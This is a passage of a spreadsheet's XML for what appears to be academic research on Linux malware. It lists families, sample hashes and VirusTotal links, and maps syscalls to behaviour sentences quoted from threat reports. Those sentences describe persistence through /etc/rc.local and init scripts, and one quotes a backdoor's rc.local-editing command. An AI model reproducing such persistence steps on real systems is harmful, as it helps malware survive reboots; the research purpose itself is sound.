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挑選過的樣本" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="挑選過的樣本(依實驗排序)" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="家族列表" sheetId="3" r:id="rId6"/>
    <sheet state="visible" name="rule_dataset" sheetId="4" r:id="rId7"/>
    <sheet state="visible" name="Syscall類型" sheetId="5" r:id="rId8"/>
    <sheet state="visible" name="Verb in Report" sheetId="6" r:id="rId9"/>
    <sheet state="visible" name="sys整合版" sheetId="7" r:id="rId10"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2914" uniqueCount="845">
  <si>
    <t>Type</t>
  </si>
  <si>
    <t>Family</t>
  </si>
  <si>
    <t>filename</t>
  </si>
  <si>
    <t>nodeCnt</t>
  </si>
  <si>
    <t>edgeCnt</t>
  </si>
  <si>
    <t>reportCnt</t>
  </si>
  <si>
    <t>tech</t>
  </si>
  <si>
    <t>news</t>
  </si>
  <si>
    <t>analysis</t>
  </si>
  <si>
    <t>campaign</t>
  </si>
  <si>
    <t>sample num</t>
  </si>
  <si>
    <t>Worms</t>
  </si>
  <si>
    <t>Adm</t>
  </si>
  <si>
    <t>4ca4f484a53328be6da0e8c344dfb720.bin</t>
  </si>
  <si>
    <t>Botnets</t>
  </si>
  <si>
    <t>BASHLITE</t>
  </si>
  <si>
    <t>3e417aaf5c4b265f2032356b6ebae87a.bin</t>
  </si>
  <si>
    <t>Viruses</t>
  </si>
  <si>
    <t>Cephei</t>
  </si>
  <si>
    <t>731e88ae5f22ba01372a3b0cc5adccdf.bin</t>
  </si>
  <si>
    <t>Darlloz</t>
  </si>
  <si>
    <t>dfeb77cb0ba28ac3ba4be55d7bc91fad.bin</t>
  </si>
  <si>
    <t>Good</t>
  </si>
  <si>
    <t>GafGyt</t>
  </si>
  <si>
    <t>933e9eff97f50b196b2bb0fef499640e.bin</t>
  </si>
  <si>
    <t>Trojans</t>
  </si>
  <si>
    <t>Kaiten</t>
  </si>
  <si>
    <t>19bc282193a9a792aeab3eb826c73976.bin</t>
  </si>
  <si>
    <t xml:space="preserve">Good
</t>
  </si>
  <si>
    <t>LuaBot</t>
  </si>
  <si>
    <t>a220940db4be6878e47b74403a8079a1.bin</t>
  </si>
  <si>
    <t>Lupper</t>
  </si>
  <si>
    <t>b4ba07c4d9b781635b33d485b73a614f.bin</t>
  </si>
  <si>
    <t>Nuxbee</t>
  </si>
  <si>
    <t>596d841f459022f2226e3c97a674bc75.bin</t>
  </si>
  <si>
    <t>Turla</t>
  </si>
  <si>
    <t>19fbd8cbfb12482e8020a887d6427315.bin</t>
  </si>
  <si>
    <t>Winter</t>
  </si>
  <si>
    <t>47cf44a5b1f384ee8972ae4c7b0abd0a.bin</t>
  </si>
  <si>
    <t>Zariche</t>
  </si>
  <si>
    <t>bfd9db2d8677f3e2f738b823f22ecec1.bin</t>
  </si>
  <si>
    <t>Dofloo</t>
  </si>
  <si>
    <t>0046a78514a658b9b7a4e29e8581f85b.bin</t>
  </si>
  <si>
    <t>Xorddos</t>
  </si>
  <si>
    <t>0aefb67c01a24d05351b093455203fa2.bin</t>
  </si>
  <si>
    <t>edge有計入重複的</t>
  </si>
  <si>
    <t>摧毀動作、後門、不會複製</t>
  </si>
  <si>
    <t>大量複製自己於LAN</t>
  </si>
  <si>
    <t>附於附檔、仰賴user啟動程式</t>
  </si>
  <si>
    <t>C&amp;C, DoS</t>
  </si>
  <si>
    <t>https://www.geeksforgeeks.org/difference-between-virus-worm-and-trojan-horse/</t>
  </si>
  <si>
    <t>https://cyberfrat.com/how-bots-are-different-from-virus-worms-and-trojans/</t>
  </si>
  <si>
    <t>https://docs.google.com/document/d/1wBmV7QD1RMRLeOAuYdj8zXYH9DlnPO3KhCcPVR86xc0/edit</t>
  </si>
  <si>
    <t>報告文件連結</t>
  </si>
  <si>
    <t>fritzfrog</t>
  </si>
  <si>
    <t>0263de27fd997a4904ee4a92f91ac733.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/0ab8836efcaa62c7daac314e0b7ab1679319b2901578fd9e95ec3476b4c1a732</t>
  </si>
  <si>
    <t>100bff2f4ee4d88b005bb016daa04fe6.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/90b61cc77bb2d726219fd00ae2d0ecdf6f0fe7078529e87b7ec8e603008232d5</t>
  </si>
  <si>
    <t>ransomexx</t>
  </si>
  <si>
    <t>14c5ec9adca563a273320a6a4408cbde.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/6b667bb7e4f3f2cb6c6f2d43290f32f41ae9f0d6ed34b818d78490050f7582a1</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>IPStorm.C</t>
  </si>
  <si>
    <t>177d4a0b196b446c77a2aa660be7b2b8.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/87990db7c4d3e07d4c16f45fab3efd1c34bcce27fe692f8e009794bd2ac1db40</t>
  </si>
  <si>
    <t>doki</t>
  </si>
  <si>
    <t>2b9440c2c2d27a102e2f1e2a7140b57c.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/4aadb47706f0fe1734ee514e79c93eed65e1a0a9f61b63f3e7b6367bd9a3e63b</t>
  </si>
  <si>
    <t>2d690589a83ca0198189e37eb1dc4ebd.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/5987472321673fd54f2aebcc33ede6541897410df36a7f4a1bd984a2f724e772</t>
  </si>
  <si>
    <t>3fe7b88a9ba6c5acee4faae760642b78.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/6fe6808b9cfe654f526108ec61cb5211bb6601d28e192cadf06102073b54f69c</t>
  </si>
  <si>
    <t>46b373987defdbe0b1ab739100f80a09.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/5fd9ad8c22bedaa17f25d5b2c8d0472487b8f61dea6ff4be33e0f00d581b97d6</t>
  </si>
  <si>
    <t>4bb2f87100fca40bfbb102e48ef43e65.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/08113ca015468d6c29af4e4e4754c003dacc194ce4a254e15f38060854f18867</t>
  </si>
  <si>
    <t>62ea27f804a1a072a55b42cf12903b8a.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/5b1b1bd309538b2f8656eca5c0e082229b492feb88f9ed9fe76b768204067b8c</t>
  </si>
  <si>
    <t>ech0raix</t>
  </si>
  <si>
    <t>67fc6852ab36c3a9cd0b8cd56c21fb80.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/4829041c64971a0cb37d55e6ba83a57e01e76b26f3f744814b59bedbb3fefce8</t>
  </si>
  <si>
    <t>yamabot</t>
  </si>
  <si>
    <t>6c00b513abe17a5b2dad29115e6cc3bb.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/b7c35ebf87287fe1f63583848f05c7608cbdb32044fa81a2d8d258faddc93eaf</t>
  </si>
  <si>
    <t>799c965e0a5a132ec2263d5fea0b0e1c.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/001eb377f0452060012124cb214f658754c7488ccb82e23ec56b2f45a636c859</t>
  </si>
  <si>
    <t>80282534d10aa0969a2f4a39639462b3.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/b0ac01090d5c80c422cb9e1fbcec690fecfb95b1ab26881739f27f597bf82b69</t>
  </si>
  <si>
    <t>ipstorm</t>
  </si>
  <si>
    <t>8134f5221e9c2b17367a278ffb900570.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/dca13d4427e79ccda8a300c90099a8eeff8fb5b0d29efdc75691625e44bc40bf</t>
  </si>
  <si>
    <t>cuul</t>
  </si>
  <si>
    <t>9ce9a0b3876aacbf0e8023c97fd0a21d.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/0ff83f3b509c0ec7070d33dceb43cef4c529338487cd7e4c6efccf2a8fd7142d</t>
  </si>
  <si>
    <t>a379695ed55c2c69361a67fcc90b7495.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/cdddd240d432b084b2c5cbe6b4a89b39a33d97840630210772b7758ec87dcacd</t>
  </si>
  <si>
    <t>mozi</t>
  </si>
  <si>
    <t>a3dd9e5c54cbb67a1f638e70bbf75766.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/2985786ea833bee477185a5fa6dcaaa975c84b0fae8d219c07a137a1d049c873</t>
  </si>
  <si>
    <t>a8a562278dfeed5b454db5001fb8c9a0.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/eda29420aaa9a70d3a552f8950159b2fcbc7c4548831c70152d3077a9f575d8e</t>
  </si>
  <si>
    <t>aa1ddf0c8312349be614ff43e80a262f.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/cb408d45762a628872fa782109e8fcfc3a5bf456074b007de21e9331bb3c5849</t>
  </si>
  <si>
    <t>aa55272ad8db954381a8eab889f087cf.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/d1e82d4a37959a9e6b661e31b8c8c6d2813c93ac92508a2771b2491b04ea2485</t>
  </si>
  <si>
    <t>ae747bc7fff9bc23f06635ef60ea0e8d.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046</t>
  </si>
  <si>
    <t>suspbehav</t>
  </si>
  <si>
    <t>c70b267a596b4a07ce743bab1769f7fa.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/cac4cb7f2f6a2f1f1a06eadbb7e3d41fc987cab24a3df7866cbcb8bf54a115f4</t>
  </si>
  <si>
    <t>c947363b50231882723bd6b07bc291ca.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/985ffee662969825146d1b465d068ea4f5f01990d13827511415fd497cf9db86</t>
  </si>
  <si>
    <t>d1a82616394437c8354c8277f60b660d.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/765a4d57b2db92c2fd904b11a3e2dd26cdaa38843cc1760ae84e3334822bf4c4</t>
  </si>
  <si>
    <t>eab2780d894f8842d0d55ac7528e4472.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/c0d7eeec4036bd2507153943a3a88dcbc399238860d8776b6581c577b7cd2c62</t>
  </si>
  <si>
    <t>f7c4cb42780b03303ca4b8535bb27207.bin</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/196eb5bfd52d4a538d4d0a801808298faadec1fc9aeb07c231add0161b416807</t>
  </si>
  <si>
    <t>success sample num</t>
  </si>
  <si>
    <t>total sample sum</t>
  </si>
  <si>
    <t>Genre of document</t>
  </si>
  <si>
    <t>ASG</t>
  </si>
  <si>
    <t>Present</t>
  </si>
  <si>
    <t>Sample</t>
  </si>
  <si>
    <t>DocId</t>
  </si>
  <si>
    <t>Γobj</t>
  </si>
  <si>
    <t>Γrsc</t>
  </si>
  <si>
    <t>Φop</t>
  </si>
  <si>
    <t>Φsys</t>
  </si>
  <si>
    <t>Node Cnt</t>
  </si>
  <si>
    <t>Step Cnt</t>
  </si>
  <si>
    <t>Attack</t>
  </si>
  <si>
    <t>Cnt</t>
  </si>
  <si>
    <t>dofloo</t>
  </si>
  <si>
    <t>D1,1</t>
  </si>
  <si>
    <t>v</t>
  </si>
  <si>
    <t>D1,2</t>
  </si>
  <si>
    <t>D1,3</t>
  </si>
  <si>
    <t>D1,4</t>
  </si>
  <si>
    <t>△</t>
  </si>
  <si>
    <t>xorddos</t>
  </si>
  <si>
    <t>D2,1</t>
  </si>
  <si>
    <t>D2,2</t>
  </si>
  <si>
    <t>D2,3</t>
  </si>
  <si>
    <t>D2,4</t>
  </si>
  <si>
    <t>D2,5</t>
  </si>
  <si>
    <t>BPFDoor</t>
  </si>
  <si>
    <t>D2,6</t>
  </si>
  <si>
    <t>Conti</t>
  </si>
  <si>
    <t>D3,6</t>
  </si>
  <si>
    <t>ChinaZ</t>
  </si>
  <si>
    <t>D3,1</t>
  </si>
  <si>
    <t>Defray777</t>
  </si>
  <si>
    <t>D3,2</t>
  </si>
  <si>
    <t>Demonbot</t>
  </si>
  <si>
    <t>D3,3</t>
  </si>
  <si>
    <t>EvilGnome</t>
  </si>
  <si>
    <t>D3,4</t>
  </si>
  <si>
    <t>FontOnLake</t>
  </si>
  <si>
    <t>D3,5</t>
  </si>
  <si>
    <t>HCRootkit</t>
  </si>
  <si>
    <t>lupper</t>
  </si>
  <si>
    <t>D8,1</t>
  </si>
  <si>
    <t>KEYPLUG</t>
  </si>
  <si>
    <t>D8,2</t>
  </si>
  <si>
    <t>Lightning</t>
  </si>
  <si>
    <t>D8,3</t>
  </si>
  <si>
    <t>Melofee</t>
  </si>
  <si>
    <t>D8,4</t>
  </si>
  <si>
    <t>XMRigMiner</t>
  </si>
  <si>
    <t>Gafgyt</t>
  </si>
  <si>
    <t>D4,1</t>
  </si>
  <si>
    <t>sum</t>
  </si>
  <si>
    <t>D4,2</t>
  </si>
  <si>
    <t>Moose</t>
  </si>
  <si>
    <t>D4,4</t>
  </si>
  <si>
    <t>D4,3</t>
  </si>
  <si>
    <t>5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3</t>
  </si>
  <si>
    <t>三角形表示有錄製到惡意程式對於 file 的操作，也有錄製到 ip, socket 等網路行為。</t>
  </si>
  <si>
    <t>D4,5</t>
  </si>
  <si>
    <t>95776f31cbcac08eb3f3e9235d07513a6d7a6bf9f1b7f3d400b2cf0afdb088a7</t>
  </si>
  <si>
    <t>而該程式的功能是作為 C&amp;C server 的 bot or backdoor，網路行為才是主要的惡意行為，</t>
  </si>
  <si>
    <t>D4,6</t>
  </si>
  <si>
    <t>14afd7d319cf271a7d871f297a27eac388d7f0381a1fc0691b18a8dd15ddf327</t>
  </si>
  <si>
    <t>但我們目前無法分析網路封包內容，因此無法判斷是否真的錄製到惡意的網路活動。</t>
  </si>
  <si>
    <t>D4,7</t>
  </si>
  <si>
    <t>da3bb9669fb983ad8d2ffc01aab9d56198bd9cedf2cc4387f19f4604a070a9b5</t>
  </si>
  <si>
    <t>D4,8</t>
  </si>
  <si>
    <t>9de853e88ba363b124dfce61bc766f8f42c84340c7bd2f4195808434f4ed81e3</t>
  </si>
  <si>
    <t>多數的 malware 都有做到 persistent</t>
  </si>
  <si>
    <t>Luabot</t>
  </si>
  <si>
    <t>D5,1</t>
  </si>
  <si>
    <t>7ffab36b2fa68d0708c82f01a70c8d10614ca742d838b69007f5104337a4b869</t>
  </si>
  <si>
    <t>D5,2</t>
  </si>
  <si>
    <t>602c435834d796943b1e547316c18a9a64c68f032985e7a5a763339d82598915</t>
  </si>
  <si>
    <t>D5,3</t>
  </si>
  <si>
    <t>D5,4</t>
  </si>
  <si>
    <t>99b36963f0e93a5c59cbd205d102f6b850f02f5e74ac4f66257b6f38d9c9ef5a</t>
  </si>
  <si>
    <t>D5,5</t>
  </si>
  <si>
    <t>fd285c2fb4d42dde23590118dba016bf5b846625da3abdbe48773530a07bcd1e</t>
  </si>
  <si>
    <t>D5,6</t>
  </si>
  <si>
    <t>407ab8618fed74fdb5fd374f3ed4a2fd9e8ea85631be2787e2ad17200f0462b8</t>
  </si>
  <si>
    <t>D5,7</t>
  </si>
  <si>
    <t>01a1aa3cd4831197c4c97164d721dca41bbec2ba98ec6813979dcb2820ab44e1</t>
  </si>
  <si>
    <t>D5,8</t>
  </si>
  <si>
    <t>D6,1</t>
  </si>
  <si>
    <t>D6,2</t>
  </si>
  <si>
    <t>D6,3</t>
  </si>
  <si>
    <t>D6,4</t>
  </si>
  <si>
    <t>D6,5</t>
  </si>
  <si>
    <t>D7,1</t>
  </si>
  <si>
    <t>D7,2</t>
  </si>
  <si>
    <t>D7,3</t>
  </si>
  <si>
    <t>D7,4</t>
  </si>
  <si>
    <t>D9,1</t>
  </si>
  <si>
    <t>D9,2</t>
  </si>
  <si>
    <t>D9,3</t>
  </si>
  <si>
    <t>D9,4</t>
  </si>
  <si>
    <t>D9,5</t>
  </si>
  <si>
    <t>D9,6</t>
  </si>
  <si>
    <t>D9,7</t>
  </si>
  <si>
    <t>D9,8</t>
  </si>
  <si>
    <t>D10,1</t>
  </si>
  <si>
    <t>D10,2</t>
  </si>
  <si>
    <t>D10,3</t>
  </si>
  <si>
    <t>D11,1</t>
  </si>
  <si>
    <t>D11,2</t>
  </si>
  <si>
    <t>D12,1</t>
  </si>
  <si>
    <t>D12,2</t>
  </si>
  <si>
    <t>D12,3</t>
  </si>
  <si>
    <t>D13,1</t>
  </si>
  <si>
    <t>D13,2</t>
  </si>
  <si>
    <t>D14,1</t>
  </si>
  <si>
    <t>D15,1</t>
  </si>
  <si>
    <t>D15,2</t>
  </si>
  <si>
    <t>D16,1</t>
  </si>
  <si>
    <t>D17,1</t>
  </si>
  <si>
    <t>D17,2</t>
  </si>
  <si>
    <t>D17,3</t>
  </si>
  <si>
    <t>D18,1</t>
  </si>
  <si>
    <t>D19,1</t>
  </si>
  <si>
    <t>D19,2</t>
  </si>
  <si>
    <t>D21,1</t>
  </si>
  <si>
    <t>D21,2</t>
  </si>
  <si>
    <t>D21,3</t>
  </si>
  <si>
    <t>D21,4</t>
  </si>
  <si>
    <t>Family Name</t>
  </si>
  <si>
    <t>VirusTotal Page</t>
  </si>
  <si>
    <t>Mayhem</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/mayhem/comments</t>
  </si>
  <si>
    <t>Remaiten</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/remaiten/comments</t>
  </si>
  <si>
    <t>GafGyt/BASHLITE/Qbot</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/gafgyt/comments</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/qbot/comments</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/bashlite/comments</t>
  </si>
  <si>
    <t xml:space="preserve">LuaBot </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/luabot/comments</t>
  </si>
  <si>
    <t>Hydra</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/hydra/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Kaiten </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/kaiten/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Rexob </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/rexob/comments</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/turla/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Hummingbad </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/hummingbad/comments</t>
  </si>
  <si>
    <t xml:space="preserve">NyaDrop </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/nyadrop/comments</t>
  </si>
  <si>
    <t xml:space="preserve">PNScan </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/pnscan/comments</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/42/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Binom </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/binom/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Bliss </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/bliss/comments</t>
  </si>
  <si>
    <t>Brundle</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/brundle/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Cephei </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/cephei/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Coin </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/coin/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Nuxbee </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/nuxbee/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Winter </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/winter/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Winux </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/winux/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Zariche </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/zariche/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Adm </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/adm/comments</t>
  </si>
  <si>
    <t>Adore</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/adore/comments</t>
  </si>
  <si>
    <t>Badbunny</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/badbunny/comments</t>
  </si>
  <si>
    <t>Cheese</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/cheese/comments</t>
  </si>
  <si>
    <t>Devnull</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/devnull/comments</t>
  </si>
  <si>
    <t>Kork</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/kork/comments</t>
  </si>
  <si>
    <t>Lion</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/lion/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Darlloz </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/darlloz/comments</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/lupper/comments</t>
  </si>
  <si>
    <t>Millen</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/millen/comments</t>
  </si>
  <si>
    <t xml:space="preserve">Ramen </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/ramen/comments</t>
  </si>
  <si>
    <t>Rootkits</t>
  </si>
  <si>
    <t xml:space="preserve">Snakso </t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/search/snakso/comments</t>
  </si>
  <si>
    <t xml:space="preserve">參考來源 : </t>
  </si>
  <si>
    <t>Linux Malware Wikipedia</t>
  </si>
  <si>
    <t>Virustotal</t>
  </si>
  <si>
    <t>我們將 Wiki 提供的各種 Family 透過 Virustotal 確認其真實性，上述 Family 均有提供 Virustotal 查詢結果</t>
  </si>
  <si>
    <t>EntityType</t>
  </si>
  <si>
    <t>ActionType</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>Syscall</t>
  </si>
  <si>
    <t>EnVerb</t>
  </si>
  <si>
    <t>Sentence</t>
  </si>
  <si>
    <t>FILE</t>
  </si>
  <si>
    <t>FILE_READ</t>
  </si>
  <si>
    <t>man</t>
  </si>
  <si>
    <t>read()</t>
  </si>
  <si>
    <t>read</t>
  </si>
  <si>
    <t>read from a file descriptor</t>
  </si>
  <si>
    <t>readlink()</t>
  </si>
  <si>
    <t>read value of a symbolic link</t>
  </si>
  <si>
    <t>place</t>
  </si>
  <si>
    <t>readlink() places the contents of the symbolic link path in the buffer buf</t>
  </si>
  <si>
    <t>Dofloo.Security</t>
  </si>
  <si>
    <t>gather</t>
  </si>
  <si>
    <t>Once the malware has infected a system, it can gather system information, including model ID and CPU description, speed, family, model, and type.</t>
  </si>
  <si>
    <t>Dofloo.Trend</t>
  </si>
  <si>
    <t>This Backdoor gathers the following data: CPU information Memory statistics IP address of infected machine Reads the following information from /proc:</t>
  </si>
  <si>
    <t>Xorddos.Micro</t>
  </si>
  <si>
    <t>fetch</t>
  </si>
  <si>
    <t>The user mode malware calls the function getself(), which invokes readlink() to fetch the location of the malware file image on disk.</t>
  </si>
  <si>
    <t>it calls the readlink API with the first parameter as /proc/self/exe to fetch its full process path.</t>
  </si>
  <si>
    <t>Xorddos.Intezer</t>
  </si>
  <si>
    <t>look</t>
  </si>
  <si>
    <t>As shown in Figure 6, the malware looks up its current path and moves the binary to the created folder. It hides the file by naming it “.po1kitd-update-k”.</t>
  </si>
  <si>
    <t>Tsunami.Aquasec</t>
  </si>
  <si>
    <t>The attackers are looking for more vulnerable machines on the same network as the infected machine.</t>
  </si>
  <si>
    <t>Dofloo.Bleep</t>
  </si>
  <si>
    <t>see</t>
  </si>
  <si>
    <t>campaigns started spreading to the cloud following the drop in activity seen by ransomware operations after the end of 2017.</t>
  </si>
  <si>
    <t>Dofloo.Syscall</t>
  </si>
  <si>
    <t>however before it overwrites this file it first checks to see if it has already done so.</t>
  </si>
  <si>
    <t>Miria.Trend</t>
  </si>
  <si>
    <t>use</t>
  </si>
  <si>
    <t>Exploits - takes advantage of a software vulnerability or security flaw and can be used to remotely access a network and gain elevated privileges</t>
  </si>
  <si>
    <t>Dofloo.Mal</t>
  </si>
  <si>
    <t>how this malware use socket to connect an IP, for example, since the code is too long. But to be noted, since ARM architecture has different structure than Intel, and ARM is designed for the embedded systems, you will see many different method for the detail operation that is involving with the system calls.</t>
  </si>
  <si>
    <t>extract</t>
  </si>
  <si>
    <t>Screenshot of the randomly-named files the XorDdos rootkit extracts to the /usr/bin folder.</t>
  </si>
  <si>
    <t>hostos	Distribution	Extracted from /etc/issue or /etc/redhat-release</t>
  </si>
  <si>
    <t>ACCESS</t>
  </si>
  <si>
    <t>access()</t>
  </si>
  <si>
    <t>check</t>
  </si>
  <si>
    <t>check real user's permissions for a file</t>
  </si>
  <si>
    <t>access</t>
  </si>
  <si>
    <t>access() checks whether the calling process can access the file pathname.</t>
  </si>
  <si>
    <t>STATUS</t>
  </si>
  <si>
    <t>statfs()</t>
  </si>
  <si>
    <t>get</t>
  </si>
  <si>
    <t>get file system statistics</t>
  </si>
  <si>
    <t>stat()</t>
  </si>
  <si>
    <t>get file status</t>
  </si>
  <si>
    <t>stat64()</t>
  </si>
  <si>
    <t>fstat()</t>
  </si>
  <si>
    <t>newfstatat()</t>
  </si>
  <si>
    <t>lstat()</t>
  </si>
  <si>
    <t>DIR</t>
  </si>
  <si>
    <t>getcwd()</t>
  </si>
  <si>
    <t>get current working directory</t>
  </si>
  <si>
    <t>getdents()</t>
  </si>
  <si>
    <t>get directory entries</t>
  </si>
  <si>
    <t>WAIT</t>
  </si>
  <si>
    <t>poll()</t>
  </si>
  <si>
    <t>wait</t>
  </si>
  <si>
    <t>wait for some event on a file descriptor</t>
  </si>
  <si>
    <t>ppoll()</t>
  </si>
  <si>
    <t>FD_DUP</t>
  </si>
  <si>
    <t>dup</t>
  </si>
  <si>
    <t>duplicate</t>
  </si>
  <si>
    <t>duplicate a file descriptor</t>
  </si>
  <si>
    <t>create</t>
  </si>
  <si>
    <t>These system calls create a copy of the file descriptor oldfd</t>
  </si>
  <si>
    <t>share</t>
  </si>
  <si>
    <t>share file offset and file status flags</t>
  </si>
  <si>
    <t>dup2</t>
  </si>
  <si>
    <t>FD_OTHER</t>
  </si>
  <si>
    <t>fcntl()</t>
  </si>
  <si>
    <t>manipulate</t>
  </si>
  <si>
    <t>manipulate file descriptor</t>
  </si>
  <si>
    <t>find</t>
  </si>
  <si>
    <t>find the lowest numbered available file descriptor</t>
  </si>
  <si>
    <t xml:space="preserve">get a new file descriptor or the file status flags </t>
  </si>
  <si>
    <t>set</t>
  </si>
  <si>
    <t>set or clear a file segment lock</t>
  </si>
  <si>
    <t>fcntl64()</t>
  </si>
  <si>
    <t>CREATE_OPEN</t>
  </si>
  <si>
    <t>mkdir</t>
  </si>
  <si>
    <t xml:space="preserve">create </t>
  </si>
  <si>
    <t>create a directory</t>
  </si>
  <si>
    <t>open</t>
  </si>
  <si>
    <t>open and possibly create a file or device</t>
  </si>
  <si>
    <t>openat</t>
  </si>
  <si>
    <t>open a file relative to a directory file descriptor</t>
  </si>
  <si>
    <t>mmap</t>
  </si>
  <si>
    <t>map</t>
  </si>
  <si>
    <t>map or unmap files or devices into memory</t>
  </si>
  <si>
    <t>mmap() creates a new mapping in the virtual address space of the calling process.</t>
  </si>
  <si>
    <t>mmap2</t>
  </si>
  <si>
    <t>map files or devices into memory</t>
  </si>
  <si>
    <t>umask</t>
  </si>
  <si>
    <t>set file mode creation mask</t>
  </si>
  <si>
    <t>link</t>
  </si>
  <si>
    <t>make</t>
  </si>
  <si>
    <t>make a new name for a file</t>
  </si>
  <si>
    <t>link() creates a new link (also known as a hard link) to an existing file.</t>
  </si>
  <si>
    <t>linkat</t>
  </si>
  <si>
    <t>create a file link relative to directory file descriptors</t>
  </si>
  <si>
    <t>symlinkat</t>
  </si>
  <si>
    <t>create a symbolic link relative to a directory file descriptor</t>
  </si>
  <si>
    <t>symlink</t>
  </si>
  <si>
    <t>symlink() creates a symbolic link named newpath which contains the string oldpath.</t>
  </si>
  <si>
    <t>add</t>
  </si>
  <si>
    <t>Persistence is achieved by the malware by adding to /etc/rc.local and the /etc/init.d/boot.local files (in the auto_boot function);</t>
  </si>
  <si>
    <t>Dofloo.Tend</t>
  </si>
  <si>
    <t>This Backdoor adds the following processes: sed -i -e '/exit/d' /etc/rc.local</t>
  </si>
  <si>
    <t>drop</t>
  </si>
  <si>
    <t>The malware drops an init script at the location /etc/init.d.</t>
  </si>
  <si>
    <t>Tsunami.Aquasec2</t>
  </si>
  <si>
    <t>The file k.sh that was dropped and executed on the attacked server</t>
  </si>
  <si>
    <t>Tsunami.Aquasec3</t>
  </si>
  <si>
    <t>mount</t>
  </si>
  <si>
    <t>one reason for the daemon process to change the directory to the root partition (“/“)is because running the process from the mounted file system prevents unmounting unless the process is stopped.</t>
  </si>
  <si>
    <t>Miria.IsSans</t>
  </si>
  <si>
    <t>big-ip mounts the /usr partition read-only.</t>
  </si>
  <si>
    <t>UPDATE</t>
  </si>
  <si>
    <t>fchdir()</t>
  </si>
  <si>
    <t>change</t>
  </si>
  <si>
